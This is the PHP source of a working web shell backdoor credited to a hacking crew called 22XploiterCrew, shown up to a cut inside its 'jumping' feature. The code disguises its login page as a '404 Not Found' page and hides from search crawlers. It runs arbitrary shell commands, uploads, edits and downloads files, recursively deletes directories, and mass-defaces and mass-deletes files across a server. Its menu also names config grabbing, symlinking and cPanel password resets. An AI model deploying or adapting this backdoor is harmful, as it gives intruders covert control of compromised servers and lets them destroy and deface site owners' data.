Shell Backdoor 22 Xploiter Crew

1. <?php
2. /*
3. [ Tak semua kami ngotak sendiri ]
4. Special thanks for Holiq@Indosec
5. Collabs team 22XploiterCrew ft Indosec Coder Team
6. */
7. session_start();
8. error_reporting(0);
9. set_time_limit(0);
10. @clearstatcache();
11. @ini_set('error_log',NULL);
12. @ini_set('log_errors',0);
13. @ini_set('max_execution_time',0);
14. @ini_set('output_buffering',0);
15. @ini_set('display_errors', 0);
16.  
17. $password = "5c928dc2240aedd7b70cc6fb0d8ee028"; // 22XC
18. $color = "#00ff00";
19. $default_action = 'FilesMan';
20. $default_use_ajax = true;
21. $default_charset = 'UTF-8';
22.  
23. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
24. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
25. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
26. header('HTTP/1.0 404 Not Found');
27. exit;
28. }
29. }
30.  
31. function login_shell() {
32. ?>
33. <!doctype html>
34. <html lang="en">
35. <head>
36. <!-- Required meta tags -->
37. <meta charset="utf-8">
38. <meta name='viewport' content='widht=device-widht, initial-scale=0.75'>
39. <link rel='icon' type='image/png' href='https://avatars3.githubusercontent.com/u/53482167?s=460&v=4'/>
40. <meta name='author' content='CodeXploit|Mr.R4ND5@22XploiterCrew'/>
41. <meta name='author' content='Holiq@Indosec'/>
42. <meta name='copyright' content='22XploiterCrew'/>
43. <meta name='description' content='Imutz Shell Backdoor'>
44. <meta name="theme-color" content="#000">
45.  
46. <!-- Bootstrap CSS -->
47. <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
48. <link href="https://fonts.googleapis.com/css?family=Rock Salt|Righteous" rel="stylesheet">
49.  
50. <title>404 Not Found</title>
51. <style>
52. body{
53. background-color:black;
54. }
55. img{
56. width: 450px;
57. height: 250px;
58. }
59. input[type="password"]{
60. background-color: transparent;
61. }
62. h2{
63. font-family:"Rock Salt";
64. }
65. </style>
66. </head>
67. <body class="text-white">
68. <div class="p-3">
69. <h2 class="text-center">22XploiterCrew</h2><hr>
70. <img src="https://cdn.pixabay.com/photo/2012/05/07/02/49/pirate-47705_960_720.png" class="mx-auto d-block"><hr>
71. <form method="post">
72. <div class="row">
73. <div class="col">
74. <input type="password" name="pass" class="form-control">
75. </div>
76. <div class="col">
77. <input type="submit" class="btn btn-outline-light btn-block" value="Login">
78. </div>
79. </div></form>
80. <hr>
81. <center>
82. <small>Copyright &copy; <a href="https://22xploitercrew.com">22XploiterCrew</a></small>
83. </center>
84. </div>
85.  
86. <!-- Optional JavaScript -->
87. <!-- jQuery first, then Popper.js, then Bootstrap JS -->
88. <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
89. <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
90. <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
91. </body>
92. </html>
93. <?php
94. exit;
95. }
96. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
97. if( empty($password) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $password) ) )
98. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
99. else
100. login_shell();
101. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
102. @ob_clean();
103. $file = $_GET['file'];
104. header('Content-Description: File Transfer');
105. header('Content-Type: application/octet-stream');
106. header('Content-Disposition: attachment; filename="'.basename($file).'"');
107. header('Expires: 0');
108. header('Cache-Control: must-revalidate');
109. header('Pragma: public');
110. header('Content-Length: ' . filesize($file));
111. readfile($file);
112. exit;
113. }
114. ?>
115. <?php
116. function w($dir,$perm) {
117. if(!is_writable($dir)) {
118. return "<font color=red>".$perm."</font>";
119. } else {
120. return "<font color=lime>".$perm."</font>";
121. }
122. }
123. function r($dir,$perm) {
124. if(!is_readable($dir)) {
125. return "<font color=red>".$perm."</font>";
126. } else {
127. return "<font color=lime>".$perm."</font>";
128. }
129. }
130.  
131. function exe($cmd) {
132. if(function_exists('system')) {
133. @ob_start();
134. @system($cmd);
135. $buff = @ob_get_contents();
136. @ob_end_clean();
137. return $buff;
138. } elseif(function_exists('exec')) {
139. @exec($cmd,$results);
140. $buff = "";
141. foreach($results as $result) {
142. $buff .= $result;
143. } return $buff;
144. } elseif(function_exists('passthru')) {
145. @ob_start();
146. @passthru($cmd);
147. $buff = @ob_get_contents();
148. @ob_end_clean();
149. return $buff;
150. } elseif(function_exists('shell_exec')) {
151. $buff = @shell_exec($cmd);
152. return $buff;
153. }
154. }
155.  
156. function perms($file){
157. $perms = fileperms($file);
158.  
159. if (($perms & 0xC000) == 0xC000) {
160. // Socket
161. $info = 's';
162. } elseif (($perms & 0xA000) == 0xA000) {
163. // Symbolic Link
164. $info = 'l';
165. } elseif (($perms & 0x8000) == 0x8000) {
166. // Regular
167. $info = '-';
168. } elseif (($perms & 0x6000) == 0x6000) {
169. // Block special
170. $info = 'b';
171. } elseif (($perms & 0x4000) == 0x4000) {
172. // Directory
173. $info = 'd';
174. } elseif (($perms & 0x2000) == 0x2000) {
175. // Character special
176. $info = 'c';
177. } elseif (($perms & 0x1000) == 0x1000) {
178. // FIFO pipe
179. $info = 'p';
180. } else {
181. // Unknown
182. $info = 'u';
183. }
184.  
185. // Owner
186. $info .= (($perms & 0x0100) ? 'r' : '-');
187. $info .= (($perms & 0x0080) ? 'w' : '-');
188. $info .= (($perms & 0x0040) ?
189. (($perms & 0x0800) ? 's' : 'x' ) :
190. (($perms & 0x0800) ? 'S' : '-'));
191. // Group
192. $info .= (($perms & 0x0020) ? 'r' : '-');
193. $info .= (($perms & 0x0010) ? 'w' : '-');
194. $info .= (($perms & 0x0008) ?
195. (($perms & 0x0400) ? 's' : 'x' ) :
196. (($perms & 0x0400) ? 'S' : '-'));
197.  
198. // World
199. $info .= (($perms & 0x0004) ? 'r' : '-');
200. $info .= (($perms & 0x0002) ? 'w' : '-');
201. $info .= (($perms & 0x0001) ?
202. (($perms & 0x0200) ? 't' : 'x' ) :
203. (($perms & 0x0200) ? 'T' : '-'));
204.  
205. return $info;
206. }
207.  
208.  
209. if(isset($_GET['path'])){
210. $path = $_GET['path'];
211. chdir($path);
212. }else{
213. $path = getcwd();
214. }
215. $path = str_replace('\\','/',$path);
216. $paths = explode('/',$path);
217. if(isset($_GET['dir'])) {
218. $dir = $_GET['dir'];
219. chdir($dir);
220. } else {
221. $dir = getcwd();
222. }
223. $kernel = php_uname();
224. $ip = getHostByName(getHostName());
225. $ver = phpversion();
226. $dom = $_SERVER['HTTP_HOST'];
227. $dir = str_replace("\\","/",$dir);
228. $scdir = explode("/", $dir);
229. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "On" : "Off";
230. $ds = @ini_get("disable_functions");
231. $mysql = (function_exists('mysql_connect')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
232. $curl = (function_exists('curl_version')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
233. $wget = (exe('wget --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
234. $perl = (exe('perl --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
235. $python = (exe('python --help')) ? "<font color=black>On</font>" : "<font color=red>Off</font>";
236. $show_ds = (!empty($ds)) ? "$ds" : "NONE";
237. $total = formatSize(disk_total_space($path));
238. $free = formatSize(disk_free_space($path));
239. $total1 = disk_total_space($path);
240. $free1 = disk_free_space($path);
241. $used = formatSize($total1 - $free1);
242. function formatSize( $bytes ) {
243. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
244. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
245. return( round( $bytes, 2 ) . " " . $types[$i] );
246. }
247.  
248. function ambilKata($param, $kata1, $kata2){
249. if(strpos($param, $kata1) === FALSE) return FALSE;
250. if(strpos($param, $kata2) === FALSE) return FALSE;
251. $start = strpos($param, $kata1) + strlen($kata1);
252. $end = strpos($param, $kata2, $start);
253. $return = substr($param, $start, $end - $start);
254. return $return;
255. }
256.  
257. echo "
258. <html>
259. <title>22XploiterCrew Shell Backdoor</title>
260. <head>
261. <meta name='viewport' content='widht=device-widht, initial-scale=0.75'>
262. <link rel='icon' type='image/png' href='https://avatars3.githubusercontent.com/u/53482167?s=460&v=4'/>
263. <meta name='author' content='CodeXploit+Holiq'/>
264. <meta name='copyright' content='22XploiterCrew'/>
265. <meta name='description' content='Imutz Shell Backdoor'>
266. <meta name='theme-color' content='#000'>
267. <link rel='stylesheet' href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css'>
268. <link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.7.2/css/all.css' >
269. <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'>
270. <script src='https://code.jquery.com/jquery-3.3.1.js'></script>
271. <script src='https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js'></script>
272. <link href='http://fonts.googleapis.com/css?family=Quicksand' rel='stylesheet' type='text/css'>
273. </head>
274. <body class='text-light'>
275. <script>
276. $(document).ready(function(){
277. $(window).scroll(function(){
278. if ($(this).scrollTop() > 700) {
279. $('.scrollToTop').fadeIn();
280. }else{
281. $('.scrollToTop').fadeOut();
282. }
283. });
284. $('.scrollToTop').click(function(){
285. $('html, body').animate({scrollTop : 0},1000);
286. return false;
287. });
288. });
289. </script>
290. <style>
291. body{background-color:black;}
292. @import url(https://fonts.googleapis.com/css?family=Lato);
293. body{margin:0;padding:0;font-family:'Lato';}
294. #tab table thead th{padding:5px;font-size:16px;}
295. #tab tr {border-bottom:1px solid #fff;}
296. #tab tr:hover{background:#5B6F7D; color:#fff;}
297. #tab tr td{padding:5px;}
298. #tab tr td .badge{font-size:13px;}
299. a {font-family:'Quicksand';color:white;}
300. a:hover{color:dodgerBlue;}
301. .ico {width:20px;}
302. .ico2{width:20px;}
303. .scrollToTop{
304. position:fixed;
305. bottom:30px;
306. right:30px;
307. width:35px;
308. height:35px;
309. background:#262626;
310. color:#fff;
311. border-radius:15%;
312. text-align:center;
313. opacity:.5;
314. }
315. .scrollToTop:hover{color:#fff;}
316. .up{font-size:20px;line-height:35px;}
317. .lain{color:#888888;font-size:20px;margin-left:5px;top:1px;}
318. .lain:hover{color:#fff;}
319. .tambah{
320. width:35px;
321. height:35px;
322. line-height:35px;
323. border:1px solid;
324. border-radius:50%;
325. text-align:center;
326. }
327. .fiture{margin:2px;}
328. .tmp{background:#F4F4F4;color:rgb(153,153,153);}
329. .tmp tr td{border:solid 1px #BBBBBB;text-align:center;font-size:13px;}
330. .about{color:#000;}
331. .about .card-body .img{
332. position: relative;
333. background: url(https://i.postimg.cc/Wb1X4xNS/image.png);
334. background-size: cover;
335. width: 150px;
336. height: 150px;
337. }
338. .butn {
339. position: relative;
340. text-align: center;
341. padding: 3px;
342. background:rgba(225,225,225,.3);
343. -webkit-transition: background 300ms ease, color 300ms ease;
344. transition: background 300ms ease, color 300ms ease;
345. }
346. input[type='radio'].toggle {
347. display: none;
348. }
349. input[type='radio'].toggle + label {
350. cursor: pointer;
351. margin: 0 2px;
352. width: 60px;
353. }
354. input[type='radio'].toggle + label:after {
355. position: absolute;
356. content: '';
357. top: 0;
358. background: #fff;
359. height: 100%;
360. width: 100%;
361. z-index: -1;
362. -webkit-transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
363. transition: left 400ms cubic-bezier(0.77, 0, 0.175, 1);
364. }
365. input[type='radio'].toggle.toggle-left + label:after {
366. left: 100%;
367. }
368. input[type='radio'].toggle.toggle-right + label {
369. margin-left: -5px;
370. }
371. input[type='radio'].toggle.toggle-right + label:after {
372. left: -100%;
373. }
374. input[type='radio'].toggle:checked + label {
375. cursor: default;
376. color: #000;
377. -webkit-transition: color 400ms;
378. transition: color 400ms;
379. }
380. input[type='radio'].toggle:checked + label:after {
381. left: 0;
382. }
383. </style>
384. <nav class='navbar static-top navbar-dark'>
385. <button class='navbar-toggler'type='button' data-toggle='collapse' data-target='#info'>
386. <i style='color:#fff;' class='fa fa-user'></i>
387. </button>
388. <div class='collapse navbar-collapse' id='info'>
389. <div class='table-responsive-lg'>
390. <ul>
391. <a href='?' class='fiture btn btn-primary btn-sm btn-block mb-2'><i class='fa fa-home'></i> Home</a>
392. <div class='row'>
393. <div class='col'>
394. <a href='?dir=$dir&aksi=upload' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-upload'></i> Upload</a>
395. </div>
396. <div class='col'>
397. <a href='?dir=$dir&aksi=buat_file' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus-circle'></i> Buat File</a>
398. </div>
399. <div class='col'>
400. <a href='?dir=$dir&aksi=buat_folder' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-plus'></i> Buat Folder</a>
401. </div>
402. </div>
403. <div class='row'>
404. <div class='col'>
405. <a href='?dir=$dir&aksi=MassDeface' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Mass Deface</a>
406. </div>
407. <div class='col'>
408. <a href='?dir=$dir&aksi=MassDellete' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-trash'></i> Mass Delete</a>
409. </div>
410. <div class='col'>
411. <a href='?dir=$dir&aksi=jumping' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-triangle'></i> Jumping</a>
412. </div>
413. </div>
414. <div class='row'>
415. <div class='col'>
416. <a href='?dir=$dir&aksi=config' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-cogs'></i> Config</a>
417. </div>
418. <div class='col'>
419. <a href='?dir=$dir&aksi=adminer' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-user'></i> Adminer</a>
420. </div>
421. <div class='col'>
422. <a href='?dir=$dir&aksi=symlink' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-exclamation-circle'></i> Symlink</a>
423. </div>
424. </div>
425. <div class='row'>
426. <div class='col'>
427. <a href='?dir=$dir&aksi=CpanelReset' class='fiture btn btn-danger btn-sm btn-block'><i class='fa fa-key'></i> Auto Reset Cpanel</a>
428. </div>
429. <div class='col'>
430. <a href='?keluar' class='fiture btn btn-warning btn-sm btn-block'><i class='fa fa-sign-out'></i> keluar</a>
431. </div>
432. </div>
433. <a href='?dir=$dir&aksi=InfoServer' class='fiture btn btn-info btn-sm btn-block mt-2'>Info Server</a>
434. </ul>
435. </div>
436. </div>
437. </nav>
438. <div class=''>
439. <h1 class='text-center'><a href='https://www.22xploitercrew.com'>[ ! ] 22XploiterCrew [ ! ]</h1>
440. <center><p>Keep Fighting, Even Though It's All Impossible</a></p></center>
441. <hr/>";
442. //keluar
443. if (isset($_GET['keluar'])) {
444. session_start();
445. session_destroy();
446. echo '<script>window.location="?";</script>';
447. }
448.  
449. // Info Server
450. if($_GET['aksi'] == 'InfoServer'){
451. echo '
452. <div class="alert alert-info mt-3">
453. <h3 class="text-center">Informasi Server</h3><hr>
454. <li>Nama Server : '.$_SERVER["SERVER_NAME"].'</li>
455. <li>Ip Address : '.$_SERVER["SERVER_ADDR"].'</li>
456. <li>Port : '.$_SERVER["SERVER_PORT"].'</li>
457. <li>HDD : '.$used.' / '.$total.'</font> ( Free: '.$free.' )</li>
458. <li>Protokol : '.$_SERVER["SERVER_PROTOCOL"].'</li>
459. <li>Save Data : '.$_SERVER["HTTP_SAVE_DATA"].'</li>
460. <li>Save Mode : '.$sm.'</li>
461. <li>Fungsi Nonaktif : '.$show_ds.'</li>
462. <li>Koneksi : '.$_SERVER["HTTP_CONNECTION"].'</li>
463. <li>Software : '.$_SERVER["SERVER_SOFTWARE"].'</li>
464. <li>Dokumen Root : '.$_SERVER["DOCUMENT_ROOT"].'</li>
465. <li>G-Interface : '.$_SERVER["GATEWAY_INTERFACE"].'</li>
466. <li>R-Method : '.$_SERVER["REQUEST_METHOD"].'</li>
467. <li>Mysql : '.$mysql.'</li>
468. <li>Perl : '.$perl.'</li>
469. <li>Wget : '.$wget.'</li>
470. <li>Curl : '.$curl.'</li>
471. <li>Sistem Server : '.$kernel.'</li>
472. <hr>
473. <li>Your IP: '.$_SERVER["REMOTE_ADDR"].'</li>
474. <li>Your Browser : '.$_SERVER["HTTP_USER_AGENT"].'</li>
475. </div>';
476. }
477.  
478. //upload
479. if ($_GET['aksi'] == 'upload') {
480. echo
481. "<form method='post' enctype='multipart/form-data' name='uploader' id='uploader'>
482. <div class='form-group'>
483. <label>Upload File: </label><br>
484. <input class='' type='file' name='file'>
485. </div>
486. <div class='form-group'>
487. <input class='btn btn-primary btn-sm' type='submit' value='Upload'>
488. </div>
489. </form>";
490.  
491. if(isset($_FILES['file'])){
492. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$_FILES['file']['name'])){
493. echo '<script>window.location="?dir='.$dir.'"; alert("Upload Berhasil");</script>';
494. }else{
495. echo '<script>alert("Gagal Upload!!!");</script>';
496. }
497. }
498. }
499.  
500. //openfile
501. if (isset($_GET['dirf'])) {
502. $file = $_GET['dirf'];
503. }
504.  
505. //buat_file
506. if ($_GET['aksi'] == 'buat_file') {
507.  
508. $output = "
509. <form method='post'>
510. <input type='text' class='form-control mb-3' name='nama_file' placeholder='Nama File'>
511. <textarea name='isi_file' class='form-control mb-3' rows='8' placeholder='Isi File'></textarea>
512. <button type='sumbit' class='btn btn-outline-primary btn-block' name='bikin'>Buat</button><br/>
513. </form>";
514. echo $output;
515.  
516. if (isset($_POST['bikin'])) {
517. $nama_file = $_POST['nama_file'];
518. $isi_file = $_POST['isi_file'];
519. $handle = fopen("$nama_file", "w");
520.  
521. if (fwrite($handle, $isi_file)) {
522. echo '<script>window.location="?dir='.$dir.'"; alert("Buat File Berhasil");</script>';
523. }else{
524. echo '<script>("File Gagal Dibuat");</script>';
525. }
526. }
527. }
528.  
529. /*
530. View
531. */
532. if($_GET['aksi'] == 'view') {
533. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
534. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
535. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center>';
536. echo "
537. <textarea rows='16' class='form-control mt-3' disabled=''>".htmlspecialchars(file_get_contents($file))."</textarea>
538. <br/><br/>";
539. }
540.  
541. /*
542. Edit
543. */
544. if($_GET['aksi'] == 'edit') {
545. $nama = basename($file);
546. echo '<center>[ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]
547. [ <a href="?dir='.$path.'&aksi=hapusf&dirf='.$file.'">Delete</a> ]</center><hr>';
548. echo "<form method='post' class='mt-3'>
549. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
550. <textarea rows='16' class='form-control mb-3' name='isi'>".htmlspecialchars(file_get_contents($file))."</textarea>
551. <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Ubah</button>
552. </form><br/>";
553.  
554. if(isset($_POST['edit_file'])) {
555. $updt = fopen("$file", "w");
556. $hasil = fwrite($updt, $_POST['isi']);
557.  
558. if ($hasil) {
559. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Mengubah Isi File");</script>';
560. }else{
561. echo '<script>alert("Gagal Mengubah Isi File");</script>';
562. }
563. }
564. }
565.  
566. /*
567. Ubah Nama
568. */
569. if($_GET['aksi'] == 'rename') {
570. $nama = basename($file);
571. echo '<center>[ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Kembali</a> ]</center>';
572. echo "<form method='post' class='mt-3'>
573. <p class='ml-2'><i class='fa fa-file'></i> $nama</p>
574. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
575. <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Update</button><br/>
576. </form><br/>";
577.  
578. if(isset($_POST['rename_file'])) {
579. $lama = $file;
580. $baru = $_POST['namanew'];
581. rename( $baru, $lama);
582. if(file_exists($baru)) {
583. echo '<script>alert("Nama '.$baru.' Telah Digunakan");</script>';
584. }else{
585. if(rename( $lama, $baru)) {
586. echo '<script>window.location="?dir='.$dir.'"; alert("Sukses Mengganti Nama Menjadi '.$baru.'");</script>';
587. }else{
588. echo '<script>alert("Gagal Mengganti Nama");</script>';
589. }
590. }
591. }
592. }
593.  
594. /*
595. Delete File
596. */
597. if ($_GET['aksi'] == 'hapusf') {
598. $nama = basename($file);
599. echo '<center>
600. [ <a href="?dir='.$path.'&aksi=view&dirf='.$file.'">Lihat</a> ]
601. [ <a href="?dir='.$path.'&aksi=edit&dirf='.$file.'">Edit</a> ]
602. [ <a href="?dir='.$dir.'&aksi=rename&dirf='.$file.'">Ubah Nama</a> ]</center>';
603. $output ="
604. <div class=''>
605. <center><br/>
606. <font color='white'>Yakin Ingin Menghapus File : $nama
607. </center><br/><br/>
608. <form method='post'>
609. <div class='row'>
610. <div class='col'>
611. <input type='submit' name='ya' class='float-right btn btn-success btn-success btn-block' value='Ya'>
612. </div>
613. <div class='col'>
614. <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
615. </div>
616. </div>
617. </form>
618. </div><br/>";
619. echo $output;
620.  
621. if ($_POST['ya']) {
622. $hapus = unlink($file);
623. if ($hapus) {
624. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Menghapus File");</script>';
625. }else{
626. echo '<script>alert("Gagal Menghapus File!");</script>';
627. }
628. }
629. }
630.  
631. /*
632. Add Folder
633. */
634. if ($_GET['aksi'] == 'buat_folder' ) {
635. $output = "
636. <form method='post'>
637. <input type='text' class='form-control mb-4' name='nama_folder' placeholder='Nama Folder'>
638. <button type='sumbit' class='btn btn-outline-primary btn-block' name='buat'>Buat</button><br/>
639. </form>";
640. echo $output;
641.  
642. if (isset($_POST['buat'])) {
643. $nama_folder = $_POST['nama_folder'];
644. $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]);
645. $fd = mkdir ($folder);
646. if ($fd) {
647. echo '<script>window.location="?dir='.$dir.'"; alert("Berhasil Membuat Folder");</script>';
648. }else{
649. echo "echo '<script> alert('Folder ".$folder." Gagal Dibuat');</script>";
650. }
651. }
652. }
653.  
654. /*
655. Delete Folder
656. */
657. if ($_GET['aksi'] == 'hapus_folder' ) {
658. $nama = basename(getcwd());
659. $output ="
660. <center>[ <a href='?dir=".$dir."&aksi=rename_folder'>Ubah Nama</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]</center>
661. <div class='container'>
662. <center><br/>
663. <font color='white'>Yakin Ingin Menghapus Folder : $nama ?
664. </center><br/><br/>
665. <form method='post'>
666. <div class='row'>
667. <div class='col'>
668. <input type='submit' name='ya' class='float-right btn btn-success btn-block' value='Iya'>
669. </div>
670. <div class='col'>
671. <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a>
672. </div>
673. </div>
674. </form>
675. </div><br/>";
676. echo $output;
677.  
678. if ($_POST['ya']) {
679. if(is_dir($dir)) {
680. if(is_writable($dir)) {
681. @rmdir($dir);
682. @exe("rm -rf $dir");
683. @exe("rmdir /s /q $dir");
684. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Menghapus Folder');</script>";
685. } else {
686. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Tidak Dapat Menghapus Folder');</script>";
687. }
688. }
689. }
690. exit;
691. }
692.  
693. /*
694. Ubah Nama Folder
695. */
696. if ($_GET['aksi'] == 'rename_folder' ) {
697. $nama = basename(getcwd());
698. $output="
699. <center>
700. [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ]<hr></center><p class='ml-2'>Nama Folder => $nama</p>
701. <form method='post'>
702. <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...'><br/>
703. <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/>
704. </form>";
705. echo $output;
706.  
707. if (isset($_POST['ganti'])) {
708. $lama = $dir;
709. $baru = $_POST['namanew'];
710. $ubah = rename($lama, $baru);
711. if($ubah) {
712. echo "<script>window.location='?dir=".dirname($dir)."'; alert('Berhasil Mengganti Nama');</script>";
713. }else{
714. echo "<script>alert('Gagal Mengganti Nama');</script>" ;
715. }
716. }
717. exit;
718. }
719.  
720. /*
721. mass delete
722. */
723. if($_GET['aksi'] == 'MassDellete') {
724.  
725. function hapus_massal($dir,$namafile) {
726. if(is_writable($dir)) {
727. $dira = scandir($dir);
728. foreach($dira as $dirb) {
729. $dirc = "$dir/$dirb";
730. $lokasi = $dirc.'/'.$namafile;
731. if($dirb === '.') {
732. if(file_exists("$dir/$namafile")) {
733. unlink("$dir/$namafile");
734. }
735. } elseif($dirb === '..') {
736. if(file_exists("".dirname($dir)."/$namafile")) {
737. unlink("".dirname($dir)."/$namafile");
738. }
739. } else {
740. if(is_dir($dirc)) {
741. if(is_writable($dirc)) {
742. if($lokasi) {
743. echo "$lokasi > Terhapus\n";
744. unlink($lokasi);
745. $massdel = hapus_massal($dirc,$namafile);
746. }
747. }
748. }
749. }
750. }
751. }
752. }
753.  
754. if($_POST['start']) {
755. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
756. hapus_massal($_POST['d_dir'], $_POST['d_file']);
757. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
758. } else {
759. echo "<form method='post'>
760. <p><i class='fa fa-folder'></i> Lokasi</p>
761. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
762. <p><i class ='fa fa-file'></i> Nama File</p>
763. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br>
764. <input type='submit' name='start' value='Hapus' class='btn btn-danger form-control'>
765. </form>";
766. }
767. exit;
768. }
769.  
770.  
771.  
772. /*
773. Mass Deface
774. */
775. if($_GET['aksi'] == 'MassDeface') {
776.  
777. function tipe_massal($dir,$namafile,$isi_script) {
778. if(is_writable($dir)) {
779. $dira = scandir($dir);
780. foreach($dira as $dirb) {
781. $dirc = "$dir/$dirb";
782. $lokasi = $dirc.'/'.$namafile;
783. if($dirb === '.') {
784. file_put_contents($lokasi, $isi_script);
785. } elseif($dirb === '..') {
786. file_put_contents($lokasi, $isi_script);
787. } else {
788. if(is_dir($dirc)) {
789. if(is_writable($dirc)) {
790. echo "Berhasil => $lokasi\n";
791. file_put_contents($lokasi, $isi_script);
792. $MassDeface = tipe_massal($dirc,$namafile,$isi_script);
793. }
794. }
795. }
796. }
797. }
798. }
799.  
800. function tipe_biasa($dir,$namafile,$isi_script) {
801. if(is_writable($dir)) {
802. $dira = scandir($dir);
803. foreach($dira as $dirb) {
804. $dirc = "$dir/$dirb";
805. $lokasi = $dirc.'/'.$namafile;
806. if($dirb === '.') {
807. file_put_contents($lokasi, $isi_script);
808. } elseif($dirb === '..') {
809. file_put_contents($lokasi, $isi_script);
810. } else {
811. if(is_dir($dirc)) {
812. if(is_writable($dirc)) {
813. echo "Berhasil => $dirb/$namafile\n";
814. file_put_contents($lokasi, $isi_script);
815. }
816. }
817. }
818. }
819. }
820. }
821.  
822. if($_POST['start']) {
823.  
824. echo "<textarea class='form-control' rows='8' disabled='disabled'>";
825. if($_POST['tipe'] == 'mahal') {
826. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
827. } elseif($_POST['tipe'] == 'murah') {
828. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
829. }
830. echo "</textarea><a href='?dir=$dir' class='btn btn-info btn-block mt-3'>Kembali</a>";
831. } else {
832. echo "<form method='post'>
833. <center>
834. <p>{ Type Mass Deface }</p>
835. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
836. <label for='toggle-on' class='butn'>Biasa</label>
837. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
838. <label for='toggle-off' class='butn'>Masal</label>
839. </center><hr>
840. <p><i class='fa fa-folder'></i> Lokasi</p>
841. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
842. <p><i class ='fa fa-file'></i> Nama File</p>
843. <input type='text' name='d_file' placeholder='index.php' class='form-control'><br/>
844. <p><i class ='fa fa-file'></i> Isi File</p>
845. <textarea name='script' class='form-control' rows='5' placeholder='Hacked By 22XploiterCrew'></textarea><br/>
846. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
847. </form>";
848. }
849. exit;
850. }
851.  
852.  
853.  
854. /*
855. Jumping
856. */
857. if($_GET['aksi'] == 'jumping') {
858. $i = 0;
859. echo "<div class='card container'>";
860. if(preg_match("/hsphere/", $dir)) {
861. $urls = explode("\r\n", $_POST['url']);
862. if(isset($_POST['jump'])) {
863. echo "<pre>";
